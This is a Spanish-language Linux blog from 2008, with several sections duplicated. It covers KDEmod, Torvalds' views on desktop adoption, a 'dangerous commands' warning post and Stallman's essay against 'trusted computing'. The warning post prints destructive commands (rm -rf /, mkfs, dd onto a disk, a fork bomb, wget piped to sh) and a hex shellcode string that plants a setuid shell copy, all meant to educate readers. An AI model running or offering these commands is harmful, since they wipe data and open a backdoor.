Así es, bueno, esto no lo he contado antes por que en realidad tengo el blog abandonado y me da weba actualizar, pero vale xD
Hace tiempo, ArchLinux decidio mover KDE a la version 4, y desafortunadamente esto rompio mi sistema (ya que KDE4 no andaba y regresar a paquetes sin mantener de KDE 3.5 era torpe), de modo que tuve que reinstalar.
Tras esto, el sistema ya permitio instalar rapidamente el nuevo KDe 4.1 y, pues la verdad no me gusto.
Es inestable, pesado (a nivel de uso al menos, en memoria teoricamente se redujo el uso), y ademas sufre de dos detalles importantes: esta incompleto. Muchas aplicaciones no tienen la misma funcionalidad que en el anterior KDE, pero si tienen nuevas funcionalidades que reemplazan a las anteriores e incluso novedades, sin embargo es navaja de doble filo por que estas o bien no estan completamente implementadas o estan rotas.
Es por ello que decidi recurrir al proyecto KDEmod, el cual mantiene un sistema KDE modular y con interesantes parches que usan otras grandes distros como kubuntu (claro, siempre que no rompan nada) y hacer de KDE 3 una mejor experiencia. Uno de los beneficios de KDEMod es que ellos estan manteniendo ambas ramas de KDE, mientras que ArchLinux solo soporta la ultima KDE 4.1 por ahora.
He aqui unos screen de mi desktop ^-^
jueves, 13 de noviembre de 2008
viernes, 17 de octubre de 2008
Razones por las cuales la gente no se pasa a GNU/Linux
En una larga entrevista concedida a la Linux Foundation, Linus Torvalds ha hablado del pasado, presente y futuro de Linux, y ha comentado las razones por las cuales según su opinión Linux sigue sin triunfar en el escritorio: la gente está contenta con cómo están las cosas.
En la entrevista Torvalds confirmó que su verdadero interés era el de hacer que Linux triunfase en la informática personal, la informática de escritorio que usa la amplia mayoría de la gente. Sin embargo, las cosas no están saliendo como él podría desear, y eso se debe a una realidad eterna y palpable: mejor lo malo conocido que lo bueno por conocer, afirma en su entrevista con Linux Foundation.
“Si haces cosas de forma distinta a Windows, incluso en el caso de que las hagas mejor, no importa. Lo mejor es peor si es diferente”
El razonamiento de Linus es aplastante: no importa que Linux pueda ser mejor o peor: la inercia de los usuarios de Windows, que se encuentran a gusto con un sistema que les es muy familiar les impide considerar otras opciones, aunque estas sean mejores.
“El escritorio es también el apartado en el que la gente se pone nerviosa si algo cambia, de modo que es realmente difícil entrar en este mercado por que la gente está acostumbrada a lo que sea que utilizaran antes, y en la mayoría de los casos eso es Windows”.
De hecho, este razonamiento también se puede aplicar al reducido éxito de Windows Vista, un sistema operativo que tiene sus defectos pero que cuyo mayor problema es precisamente que algunos de los cambios han echado para atrás a los usuarios, que ya se habían acostumbrado a la forma de trabajar con Windows XP.
Fuente: http://www.theinquirer.es/2008/02/08/linus_explica_porque_la_gente_no_se_pasa_a_linux.html
Estos son comentarios sueltos sacados de esa discusión:
* por Inconight
* por juanex
* por manny
En resumen:
"Lo mejor es peor si es diferente”
¿Es esta ideologia la que queremos?
Habrá que tomar en cuenta que de aquí siempre ha partido todo lo que es humanamente malo: los nazis, la esclavitud a negros, el maltrato a irlandeses, la homofobia; practicamente TODO LO MORALMENTE INACEPTABLE viene de aquí. Y M$ no se queda atrás...
En la entrevista Torvalds confirmó que su verdadero interés era el de hacer que Linux triunfase en la informática personal, la informática de escritorio que usa la amplia mayoría de la gente. Sin embargo, las cosas no están saliendo como él podría desear, y eso se debe a una realidad eterna y palpable: mejor lo malo conocido que lo bueno por conocer, afirma en su entrevista con Linux Foundation.
“Si haces cosas de forma distinta a Windows, incluso en el caso de que las hagas mejor, no importa. Lo mejor es peor si es diferente”
El razonamiento de Linus es aplastante: no importa que Linux pueda ser mejor o peor: la inercia de los usuarios de Windows, que se encuentran a gusto con un sistema que les es muy familiar les impide considerar otras opciones, aunque estas sean mejores.
“El escritorio es también el apartado en el que la gente se pone nerviosa si algo cambia, de modo que es realmente difícil entrar en este mercado por que la gente está acostumbrada a lo que sea que utilizaran antes, y en la mayoría de los casos eso es Windows”.
De hecho, este razonamiento también se puede aplicar al reducido éxito de Windows Vista, un sistema operativo que tiene sus defectos pero que cuyo mayor problema es precisamente que algunos de los cambios han echado para atrás a los usuarios, que ya se habían acostumbrado a la forma de trabajar con Windows XP.
Fuente: http://www.theinquirer.es/2008/02/08/linus_explica_porque_la_gente_no_se_pasa_a_linux.html
Estos son comentarios sueltos sacados de esa discusión:
"Los equipos van quedando obsoletos por muchos motivos, no solo es cuestión de recursos. Manejamos mas información que antes pero eso si, ¿manteniendo los tiempos de respuesta? entonces comienzan los problemas. Esto es igual en cualquier sistema operativo, si tu quieres manejar archivos mas grandes, necesitarás mas memoria, evidentemente y mas rapidez a la hora de leer o escribir datos en un disco duro, por tanto… influye la cantidad de memoria, la velocidad de la controladora, la velocidad del disco duro y la velocidad del procesador para mantener al maximo el nivel de todos los anteriores. Usamos codecs que nos permiten ver peliculas comprimidas para ser reproducidas desde un CD. Estos evolucionan, son mas complejos y nos piden un microprocesador mas elevado. Al ser un proceso crítico, no podemos pedir que nos vaya suministrando la información segun termine, si este no lo hace a tiempo, la pelicula no la ve ni dios a no ser que tengas los nerivos de acero.
Que es cierto que no necesitamos tener un maquinon para ejecutar un programa a medida que no ha cambiado en los ultimos años, que ni siquiera evoluciona con los sistemas operativos, que permanece intacto con el paso de los años.
El problema en ese caso comienza cuando ese ordenador que ejecuta esa aplicacion deja de funcionar, entonces te compras uno nuevo, lo mas normalito que encuentres en el mercado pero… vaya, otro problemas mas. Windows 95 no funciona con los equipos nuevos, da un pequeño problema, el famoso pantallazo azul y termina por reiniciarse. Los USB tienen algo que ver. Si no han pasado los años suficientes, tendras suerte con Windows 98, sino, tendrás otro problema similar. El motivo es que han eliminado la compatibilidad de las bios para esos sistemas operativos, dejando paso a los nuevos que están en el mercado. Terminas por instalarte Windows XP, pero el programa no es compatible porque el programador de turno, independiente, no ha evolucionado su software, ya que lo ha programado una vez en su vida y tan solo lo ha tocado para solucionar fallos.
Terminas usando una maquina virtual para tener windows 95 instalado, por ejemplo. Funciona sin problemas exceptuando que… los ordenadores de hoy no tienen los mismos puertos que los de antes, dos com, uno de impresora. Pruebas con un “dongel” y no te funciona, el puerto aparentemente está ahí pero… el programa no va, otra vez en el punto inicial.
¿Que ocurre? que siempre tienes que actualizarte, te guste o no. Sea porque Microsoft esté detrás de todo esto o porque los fabricantes, que tambien son empresas y viven de lo que venden, esten tan interesados como Microsoft en que el mercado no se detenga e imagino que de esto es de lo que trata el mundo entero aunque el software libre se empeñe en demostrar que esto no deba ser así.
El mundo que hoy conocemos, que está basado en el capitalismo, lo unico que necesita para funcionar es dinero, el resto… les da exactamente igual.
Es mi opinión y repito, mis argumentos no estan basados en ninguna intencion alguna de hacer ver que un sistema operativo es peor que otro, simplemente exponen lo que dicen, sin ningun doble sentido."
* por Inconight
"La defensa de los usuarios de Windows se basa en la premisa falaz de “todo lo que hago en Windows que no puedo hacer en Linux”.
Esto es porque “Linux no es Windows” (y nunca lo será).
Es como si digo que Windows es una castaña, porque no puedo crear dos archivos con el mismo nombre, uno en mayúsculas y otro en minúsculas.
Este es el típico rechazo de los usuarios reticentes a todo cambio. Es que con Outlook hacía tal y cual, pues bien, Thunderbird o Evolution no son Outlook y tienen cosas mejores y otras peores, por ejemplo los gestores de correo de Linux no se diseñaron para instalar virus con la misma facilidad que reciben el correo. El virus “I Love You” es una muestra de lo que digo.
Yo he puesto Ubuntu en mi portátil y no he tenido que poner ni un solo driver propietario y me ha detectado la impresora, el escaner y ha puesto la resolución y el refresco de pantalla correctamente. Tardé 15 minutos en tenerlo todo operativo.
Todavía recuerdo las horas y horas que me he tirado configurando drivers de pantalla en Windows como para que no me entre la risa leyendo lo que se dice aquí.
He instalado Vmware player en mi Ubuntu sin problemas de ninguna clase, la primera vez desde Automatix y la segunda descargando un .deb de vmware.com, pero ahora uso Virtualbox por el mismo precio.
En los años que he usado Windows (desde la versión que no era capaz de superponer ventanas), he tenido todo tipo de problemas, muchos de ellos con drivers, con todo tipo de programas, con incompatibilidad del hardware, con programas que instalas y dejan inservible todo, con fallos del sistema operativo y con espectros que sin explicación alguna dejaban el sistema operativo destrozado (y a reinstalarlo todo otra vez)…
Cuantas veces habré oido lo de “Formatea y vuelve a instalarlo todo”.
Me parece de chiste sacar a relucir lo difícil que es hacer algunas cosas con Linux, cuando Windows es el sistema operativo:
- Que no aguanta encendido maś de dos días sin quedarse colgado.
- Que se queda tostado en cuanto falla una aplicación.
- En el que tienes que perder más tiempo en instalar antivirus y tapar agujeros que en trabajar.
- Que tienes que reinstalar cada pocos meses (con suerte).
- Que cada vez funciona más lento, hasta que terminas por reinstalarlo de nuevo para empezar el mismo círculo vicioso de nuevo.
y encima, cada cosa que instalas es pirata o te cuesta una pasta.
Si un usuario de Windows tuviera que pagar forzosamente los 500€ del Office, los 700€ del Photoshop, etc., simplemente se pasaría a Linux al día siguiente, pero para los fabricantes como Adobe. M$ y Autodesk es mucho mejor que la gente use copias piratas, así se acostumbran a sus programas y ellos pueden decir que tienen pérdidas astronómicas por la piratería, gran falacia que presupone que un usuario de una copia pirata habría pagado su precio de mercado.
Al final, lo cierto es que el usuario medio de Windows se pasa el día descargando del P2P e instalando cracks, con el problema de seguridad que eso conlleva.
Yo uso Ubuntu y he encontrado soluciones a todo lo que hacía, en un año que llevo usando Ubuntu en mi escritorio sólo hecho de menos un gestor de imágenes que se llama Compupic, del que tengo la licencia para Windows comprada desde principios de los 90, pero aun así, me arreglo con aplicaciones gratuitas.
Es muy fácil decir que Openoffice no puede superar a M$ office 2007, pero no es cierto, Openoffice gana por goleada en consumo de recursos, velocidad y estabilidad y vale para el 99% de los usuarios exactamente igual y su precio es (en términos matemáticos exactos), infinitamente más barato.
Me gustaría saber cuantos usuarios de M$ Office lo usarían si se vieran forzados a pagar la licencia (por ejemplo si M$ usara un sistema de protección imposible de saltar).
Creo que este tipo de debates acaban siempre convertidos en un flame.
Pues si, pero normal, porque hay quien se pone a escribir de forma subjetiva y falaz sobre el asunto.
Trabajo de director técnico de una empresa TI desde 1989 y he tenido que dar soporte de cosas como Novell, Xenix y Windows.
Durante años he instalado soluciones basadas en Windows para todo tipo de empresas (algunas muy grandes) y he conseguido que hicieran su trabajo, pero a base de muchas horas de técnicos trabajando.
Nuestra solución definitiva para los usuarios de Windows es un sistema que hemos desarrollado consistente en guardar los datos de los usuarios en un servidor Linux y un sistema en el MBR que con un menú restaura una copia limpia de Windows en unos minutos.
A los que se atreven, ahora les estamos instalando soluciones basadas en Linux, con los servidores es fácil, con el dinero de las licencias de Windows se paga el hardware y usar Linux es transparente para el usuario.
En los escritorios el principal problema es la resistencia de los usuarios a cambiar a algo que no conocen, que normalmente termina en enfrentamientos con la directiva de algunos elementos ostiles y empecinados que siempre hay en toda empresa.
He tenido algún caso en el que me han dado ganas de estrangular a alguien por una defensa irracional y falaz a más no poder de que no podían usar Linux+openoffice para enviar email y editar cuatro archivos.
En el ámbito doméstico la gente que haga lo que quiera, pero en las empresas acabará ganando lo más práctico y barato antes o después.
Creo que el único Windows que veremos en el futuro sera un “Windows GNU/Linux”. No me extrañaría que los de Redmon ya estuvieran trabajando en algo así."
* por juanex
"Todos incluso los que usamos linux sabemos que los desarrolladores estan trabajando duramente (incluso sin paga) para arreglar los problemas de linux, que si son bastantes, pero cada vez menos.
debes recordar que el objetivo de linux no es monopolizar, si no ser una alternativa. Cuando el mercado pase a 30% windows, 30% mac , 30% linux, y el 10% restante otros (libres o comerciales), ya habremos logrado nuestro objetivo.
destruir a m$ no es un objetivo, sino que la gente no siga monopolizada por ellos."
* por manny
En resumen:
"Lo mejor es peor si es diferente”
¿Es esta ideologia la que queremos?
Habrá que tomar en cuenta que de aquí siempre ha partido todo lo que es humanamente malo: los nazis, la esclavitud a negros, el maltrato a irlandeses, la homofobia; practicamente TODO LO MORALMENTE INACEPTABLE viene de aquí. Y M$ no se queda atrás...
sábado, 19 de abril de 2008
Comandos peligrosos
Hay mucha gente que nos quiere joder el sistema, y por varios metodos nos quieren colar scripts o hacernos meter comandos riesgozos en una terminal. El objetivo de este texto (obtenido de la comunidad de Ubuntu en inglés) es hacernos mas concientes de los peligrosos comandos en la red y como evitarlos.
- Estos comandos pueden borrar todo lo que encuentren o tengan permisos para escribir.
Código:
rm -rf /
rm -rf .
rm -rf *
Este comando borrará todos los archivos ocultos en el directorio actual:
Código:
rm -r .*
El Siguiente comando borrará todo lo que que está en una carpeta y sus contenidos:
Código:
rm -r .[^.]*
- Estos comandos se meten con tus sistemas de ficheros dañando los datos que tengas:
Código:
mkfs
mkfs.ext3
mkfs.anything
- Manipulacion de bloques en los dispositivos: provoca que datos RAW sean escritos en un bloque del dispositivo, a veces provoca la pérdida de todos tus datos por abuso del sistema de ficheros:
Código:
any_command > /dev/sda
dd if=something of=/dev/sda
Forkbomb: Es un comando que repite procesos de forma infinita hasta congelar el sistema y obligarte a hacer un hard reset, provocando posibles pérdidas de datos:
Código:
:(){:|:&};:
Una forkbomb en Perl:
Código:
fork while fork
Tarbomb: Son archivos tar que al descomprimirse en una carpeta ya existente sobreescriben ficheros y hacen muchos nuevos de forma enfermiza, para evitar esto siempre hay que extraer los ficheros comprimidos en un nuevo directorio limpio.
Decompression bomb: Similar al Tarbomb, estos archivos aparentan ser muy pequeños pero al descomprimirlos llenan tu disco con
Shellscript: A veces alguien te da un enlace para que ejecutes un shellscript. Esto puede contener cualquier comando que comience con -- . No confies y no ejecutes codigos que no estes seguro de su confiabilidad.
Código:
wget http://some_place/some_file
sh ./some_file
Código:
wget http://some_place/some_file -O- | sh
Compilando desde las fuentes: Un problema muy común, donde alguien simplemente te da el código fuente de alguna aplicación y te dice que lo compiles. Al hacer esto comprometes tu equipo puesto que es muy facil ocultar código malicioso en las grandes cantidades de código que por lo general una aplicación o librería tiene. Es por ello que lo mejor es siempre obtener y compilar nuestro software desde fuentes confibles (como la web del autor o SourceForge).
Shellcodes: Una shellcode es un conjunto de órdenes programadas generalmente en lenguaje ensamblador que se inyectan en la pila para conseguir que la máquina en la que reside se ejecute la operación que se haya programado. Se utilizan para ejecutar código aprovechando ciertas vulnerabilidades exploit en el código llamadas desbordamiento de búfer. Principalmente el shellcode se programa para permitir ejecutar un intérprete de comandos en el equipo afectado.
Código:
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
Esto ultimo en realidad ejecuta 'rm -rf ~ / &', lo cual destruirá todos tus ficheros como usuario regular y todo tu sistema de archivos si eres root. Es por ello que JAMÁS debes confiar en los shellcodes, que aunque para un novato puedan parecer una geekeada hexadecimal es en realidad un peligroso comando.
_________________________________________________________________
En resumen, la seguridad en cualquier sistema UNIX, depende mucho de la cautela de su administrador, evitando usar estos comandos y siguiendo las sugerencias nos acercamos a un sistema mas sano.
- Estos comandos pueden borrar todo lo que encuentren o tengan permisos para escribir.
Código:
rm -rf /
rm -rf .
rm -rf *
Este comando borrará todos los archivos ocultos en el directorio actual:
Código:
rm -r .*
El Siguiente comando borrará todo lo que que está en una carpeta y sus contenidos:
Código:
rm -r .[^.]*
- Estos comandos se meten con tus sistemas de ficheros dañando los datos que tengas:
Código:
mkfs
mkfs.ext3
mkfs.anything
- Manipulacion de bloques en los dispositivos: provoca que datos RAW sean escritos en un bloque del dispositivo, a veces provoca la pérdida de todos tus datos por abuso del sistema de ficheros:
Código:
any_command > /dev/sda
dd if=something of=/dev/sda
Forkbomb: Es un comando que repite procesos de forma infinita hasta congelar el sistema y obligarte a hacer un hard reset, provocando posibles pérdidas de datos:
Código:
:(){:|:&};:
Una forkbomb en Perl:
Código:
fork while fork
Tarbomb: Son archivos tar que al descomprimirse en una carpeta ya existente sobreescriben ficheros y hacen muchos nuevos de forma enfermiza, para evitar esto siempre hay que extraer los ficheros comprimidos en un nuevo directorio limpio.
Decompression bomb: Similar al Tarbomb, estos archivos aparentan ser muy pequeños pero al descomprimirlos llenan tu disco con
Shellscript: A veces alguien te da un enlace para que ejecutes un shellscript. Esto puede contener cualquier comando que comience con -- . No confies y no ejecutes codigos que no estes seguro de su confiabilidad.
Código:
wget http://some_place/some_file
sh ./some_file
Código:
wget http://some_place/some_file -O- | sh
Compilando desde las fuentes: Un problema muy común, donde alguien simplemente te da el código fuente de alguna aplicación y te dice que lo compiles. Al hacer esto comprometes tu equipo puesto que es muy facil ocultar código malicioso en las grandes cantidades de código que por lo general una aplicación o librería tiene. Es por ello que lo mejor es siempre obtener y compilar nuestro software desde fuentes confibles (como la web del autor o SourceForge).
Shellcodes: Una shellcode es un conjunto de órdenes programadas generalmente en lenguaje ensamblador que se inyectan en la pila para conseguir que la máquina en la que reside se ejecute la operación que se haya programado. Se utilizan para ejecutar código aprovechando ciertas vulnerabilidades exploit en el código llamadas desbordamiento de búfer. Principalmente el shellcode se programa para permitir ejecutar un intérprete de comandos en el equipo afectado.
Código:
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
Esto ultimo en realidad ejecuta 'rm -rf ~ / &', lo cual destruirá todos tus ficheros como usuario regular y todo tu sistema de archivos si eres root. Es por ello que JAMÁS debes confiar en los shellcodes, que aunque para un novato puedan parecer una geekeada hexadecimal es en realidad un peligroso comando.
_________________________________________________________________
En resumen, la seguridad en cualquier sistema UNIX, depende mucho de la cautela de su administrador, evitando usar estos comandos y siguiendo las sugerencias nos acercamos a un sistema mas sano.
Administración sana de nuestro UNIX
Saludos.
Se que tengo tiempo sin publicar algo, y se que esto ya tiene tiempo sucediendo, y es que me da flojera estar actualizando el puto blog.
En fin, para no marearlos con el clasico bloggero "no tengo oportunidad/tiempo/ganas/ideas para actualizar" mejor vamos al tema directamente.
Esta vez voy a abrir una nueva serie llamada "Administración Sana para Sistemas UNIX", en la cual basicamente hablaré sobre como hacer nuestro sistema mas solido y seguro.
Espero retroalimentación de ser posible xD...
Se que tengo tiempo sin publicar algo, y se que esto ya tiene tiempo sucediendo, y es que me da flojera estar actualizando el puto blog.
En fin, para no marearlos con el clasico bloggero "no tengo oportunidad/tiempo/ganas/ideas para actualizar" mejor vamos al tema directamente.
Esta vez voy a abrir una nueva serie llamada "Administración Sana para Sistemas UNIX", en la cual basicamente hablaré sobre como hacer nuestro sistema mas solido y seguro.
Espero retroalimentación de ser posible xD...
viernes, 11 de abril de 2008
Computacion Confiable [TC] o ¿Computacion Traicionera?
¿De quién debería recibir órdenes su computadora? Mucha gente piensa que sus computadoras deberían obedecerles a ellos, en vez de a otras personas. Mediante un plan al que llaman "computación confiable" ("trusted computing", en inglés), grandes corporaciones de los medios de comunicación (incluyendo las compañías cinematográficas y de la industria discográfica) junto con compañías de computadoras tales como Microsoft e Intel, están planificando hacer que su computadora los obedezca a ellos en vez de a usted. (La versión de Microsoft de este esquema se llama "Palladium"). Los programas privativos han incluido características maliciosas en el pasado, pero este plan haría esto universal.
Software privativo significa, fundamentalmente, que usted no controla lo que hace; no puede estudiar el código fuente o modificarlo. No es sorprendente que hábiles hombres de negocios encuentren formas de usar su control para ponerle a usted en desventaja. Microsoft ha hecho esto varias veces; una versión de Windows fue diseñada para reportar a Microsoft todo el software en su disco duro; una reciente actualización de "seguridad" en el Reproductor Multimedia de Windows requería que los usuarios aceptaran nuevas restricciones. Pero Microsoft no está solo: el software para intercambio de música KaZaa está diseñado de forma que un asociado de negocios de KaZaa pueda alquilar el uso de su computadora a sus clientes. Estas características maliciosas son normalmente secretas, pero una vez que usted se entera de ellas es difícil eliminarlas, dado que no dispone del código fuente.
En el pasado, estos fueron incidentes aislados. "Computación confiable" los haría omnipresentes. "Computación traidora" es un nombre más apropiado, porque el plan está diseñado para asegurarse de que su computadora sistemáticamente lo desobedecerá. De hecho, está diseñado para que la misma deje de funcionar como una computadora de propósito general. Cada operación puede requerir de una autorización explícita.
La idea técnica detrás de la computación traidora es que la computadora incluye un dispositivo de cifrado y firma digital, y las claves se mantienen secretas para usted. Los programas privativos usan este dispositivo para controlar qué otros programas puede ejecutar, a qué documentos o datos puede acceder y a qué programas se los puede transferir. Esos programas continuamente descargarán nuevas reglas de autorización a través de Internet, e impondrán dichas reglas automáticamente a su trabajo. Si usted no permite a su computadora obtener las nuevas reglas periódicamente de Internet, algunas capacidades dejarán automáticamente de funcionar.
Por supuesto, Hollywood y las compañías discográficas planean usar la computación traidora para "DRM" ("Administración de Restricciones Digitales" o "Digital Restriction Management", en inglés), así los vídeos y la música descargados podrán ser reproducidos sólo en una computadora específica. Compartir será completamente imposible, al menos usando los archivos autorizados que deberá obtener de dichas compañías. Usted, el público, debería tener la libertad y la habilidad de compartir esas cosas. (Espero que alguien encuentre la forma de producir versiones no cifradas, y de subirlas y compartirlas, así DRM no tendrá éxito completamente, pero esto no es excusa para el sistema).
Hacer imposible el compartir ya es lo suficientemente malo, pero se pone peor. Existen planes para usar la misma facilidad al enviar documentos por correo electrónico -- resultando en mensajes que desaparecen en dos semanas, o documentos que sólo pueden ser leídos en las computadoras de determinada compañía.
Imagínese si usted recibiera un mensaje de correo electrónico de su jefe diciéndole que haga algo que usted piensa que es arriesgado; un mes después, cuando el tiro sale por la culata no puede usar el mensaje para mostrar que la decisión no fue suya. "Ponerlo por escrito" no lo protege si la orden está escrita en tinta que desaparece.
Imagínese si usted recibe un mensaje de correo electrónico de su jefe estableciendo una política que es ilegal o inmoral, tal como destrozar los documentos de auditoría de su compañía, o permitir que una amenaza peligrosa para su país avance sin ser controlada. Actualmente, usted puede enviar esto a un periodista y exponer la actividad. Con la computación traidora, el periodista no será capaz de leer el documento; su computadora se negará a obedecerlo. La computación traidora se transforma en un paraíso para la corrupción.
Los procesadores de texto tales como Microsoft Word podrían usar la computación traidora cuando usted guarde sus documentos, para asegurarse de que ningún procesador de texto de la competencia podrá leerlos. Actualmente debemos averiguar los secretos del formato de Word mediante laboriosos experimentos, para que los procesadores libres puedan leer documentos de Word. Si Word cifra los documentos usando computación traidora cuando los guarda, la comunidad del software libre no tendrá la posibilidad de desarrollar software para leerlos -- y si pudiéramos, tales programas podrían ser prohibidos por la Digital Millennium Copyright Act (Ley de Copyright del Milenio Digital).
Los programas que usen computación traidora continuamente descargarán nuevas reglas de autorización desde Internet, e impondrán dichas reglas a su trabajo. Si a Microsoft, o al gobierno de los EEUU no les agrada lo que usted dice en un documento que escribió, podrán publicar nuevas restricciones diciendo a todas las computadoras que se rehusen a dejar que alguien lea dicho documento. Cada computadora del mundo obedecerá cuando descargue las nuevas instrucciones. Su escrito estará sujeto a un borrado retroactivo estilo 1984. Hasta usted podría ser incapaz de leerlo.
Podría pensar que usted puede averiguar que cosas sucias hace una aplicación de computación traidora, estudiar qué tan dañinas son, y decidir si aceptarlas. Sería ingenuo aceptarlo, pero el punto es que el trato que cree que está haciendo no se mantendrá. Una vez que usted dependa del uso del programa, estará enganchado y ellos lo saben; entonces pueden cambiar el trato. Algunas aplicaciones automáticamente bajarán actualizaciones que harán algo diferente -- y no le darán la posibilidad de elegir si desea la actualización o no.
Actualmente puede evitar ser restringido por software privativo no usándolo. Si ejecuta GNU/Linux u otro sistema operativo libre, y si evita instalar aplicaciones propietarias sobre él, entonces usted está al mando de lo que su computadora hace. Si un programa libre tiene una característica maliciosa, otros desarrolladores en la comunidad la quitarán y usted puede usar la versión corregida. Puede también ejecutar aplicaciones y herramientas libres en sistemas operativos no libres; esto falla completamente en darle libertad, pero muchos usuarios lo hacen.
La computación traidora pone en peligro la existencia de sistemas operativos y aplicaciones libres, porque usted ya no podrá ejecutarlas. Algunas versiones de la computación traidora requerirán que el sistema operativo esté específicamente autorizado por una compañía particular. Los sistemas operativos libres no podrán ser instalados. Algunas versiones de la computación traidora requerirán que cada programa sea específicamente autorizado por el desarrollador del sistema operativo. No podrá ejecutar aplicaciones libres en tales sistemas. Si usted averigua cómo hacerlo y se lo dice a alguien, eso podría constituir un delito.
Existen proyectos de ley en EEUU que requieren que todas las computadoras soporten computación traidora, y que se prohiba la conexión de computadoras antiguas a Internet. La CBDTPA (la llamamos Ley Consuma Pero No Trate de Programar, Consume But Don't Try Programming Act, en inglés) es uno de ellos. Pero inclusive si no lo fuerzan legalmente a migrar hacia la computación traidora, la presión para aceptarla puede ser enorme. Actualmente las personas usualmente utilizan el formato Word para comunicarse, aunque esto causa varios tipos de problemas (vea "Podemos Acabar con los Archivos Adjuntos en Word"). Si solamente una máquina de computación traidora puede leer los últimos documentos de Word, mucha gente migrará hacia ella, si ven la situación sólo en términos de acción individual (tómalo o déjalo). Para oponernos a la computación traidora, debemos unirnos y confrontar la situación como una elección colectiva.
Para mayor información sobre computación traidora, vea.
Bloquear la computación traidora requerirá que se organicen un gran número de ciudadanos. ¡Necesitamos su ayuda!. La Electronic Frontier Foundation (Fundación Frontera Electrónica) y Public Knowledge (Conocimiento Público) están organizando campañas en contra de la computación traidora, así como también el Digital Speech Project (Proyecto Expresión Digital) esponsorizado por la FSF. Por favor, visite estos sitios Web para poder sumarse y apoyar de su trabajo.
También puede ayudar escribiendo a las oficinas de asuntos públicos de Intel, IBM, HP/Compaq, o cualquiera a quien usted le haya comprado una computadora, explicándole que no quiere ser presionado a comprar sistemas de computación "confiable", por lo cual no está de acuerdo en que ellos los produzcan. Esto puede ejercer la presión del poder del consumidor. Si usted hace esto, por favor envíe copias de sus cartas a las organizaciones antes citadas.
Posdatas
El proyecto GNU distribuye GNU Privacy Guard, un programa que implementa cifrado de clave pública y firmas digitales, el cual puede utilizase para enviar mensajes de correo electrónico seguros y privados. Es muy ilustrativo examinar cómo GPG se diferencia de la computación traidora, y ver qué hace a una tan útil y a la otra tan peligrosa.
Cuando alguien usa GPG para enviarle un documento cifrado y usted usa GPG para decodificarlo, el resultado es un documento no cifrado que usted puede leer, reenviar, copiar e inclusive re-cifrar para enviarlo de forma segura a un tercero. Una aplicación de computación traidora lo dejaría leer las palabras en la pantalla, pero no producir un documento no cifrado que pudiera usar de otras formas. GPG, un paquete de software libre, pone las funciones de seguridad a disposición de los usuarios: ellos lo usan. La computación traidora está diseñada para imponer restricciones a los usuarios: ella los usa.
Microsoft presenta a palladium como una medida de seguridad, y proclama que brindará protección contra virus, pero esta afirmación es evidentemente falsa. Una presentación de Microsoft Research en octubre de 2002 estableció que una de las especificaciones de palladium es que los sistemas operativos y aplicaciones existentes seguirán pudiéndose ejecutar, por lo tanto, los virus seguirán siendo capaces de hacer todas las cosas que hacen actualmente.
Cuando Microsoft habla de "seguridad" con relación a palladium, no lo hace con el significado que normalmente asociamos a esa palabra: proteger a su computadora de cosas que usted no desea. Ellos se refieren a proteger su acceso a las copias de datos en su computadora de formas que otros no desean que se realice. Una diapositiva en la presentación enumeraba varios tipos de secretos que palladium podría resguardar, incluyendo "secretos de terceras partes" y "secretos de usuario" -- pero poniendo "secretos de usuario" entre comillas, reconociendo que es un absurdo en el contexto de palladium.
La presentación hizo uso frecuente de otros términos que usualmente asociamos en el contexto de seguridad, tales como "ataque", "código malicioso", "engaño" ("spoofing", en inglés), así como también "confianza". Ninguno de esos términos tiene el significado usual. "Ataque" no significa alguien tratando de dañarlo a usted, sino usted intentando copiar música. "Código malicioso" significa código instalado por usted para hacer algo que otros no desean que su computadora haga. "Engaño" no significa alguien engañándolo, sino usted engañando a palladium. Y así sucesivamente.
Una declaración previa de los desarrolladores de palladium establecía la premisa básica que quien hubiera desarrollado o recolectado información debía tener control total sobre cómo usted la usa. Esto hubiera representado una vuelta revolucionaria de ideas pasadas acerca de éticas y del sistema legal, y creado un sistema de control sin precedentes. Los problemas específicos de esos sistemas no son accidentales; sino que resultan de metas básicas. Es la meta que debemos rechazar.
Copyright © 2002 Richard Stallman.
Está permitida la distribución y copia literal de este artículo completo en cualquier medio, siempre que se preserve esta nota.
Software privativo significa, fundamentalmente, que usted no controla lo que hace; no puede estudiar el código fuente o modificarlo. No es sorprendente que hábiles hombres de negocios encuentren formas de usar su control para ponerle a usted en desventaja. Microsoft ha hecho esto varias veces; una versión de Windows fue diseñada para reportar a Microsoft todo el software en su disco duro; una reciente actualización de "seguridad" en el Reproductor Multimedia de Windows requería que los usuarios aceptaran nuevas restricciones. Pero Microsoft no está solo: el software para intercambio de música KaZaa está diseñado de forma que un asociado de negocios de KaZaa pueda alquilar el uso de su computadora a sus clientes. Estas características maliciosas son normalmente secretas, pero una vez que usted se entera de ellas es difícil eliminarlas, dado que no dispone del código fuente.
En el pasado, estos fueron incidentes aislados. "Computación confiable" los haría omnipresentes. "Computación traidora" es un nombre más apropiado, porque el plan está diseñado para asegurarse de que su computadora sistemáticamente lo desobedecerá. De hecho, está diseñado para que la misma deje de funcionar como una computadora de propósito general. Cada operación puede requerir de una autorización explícita.
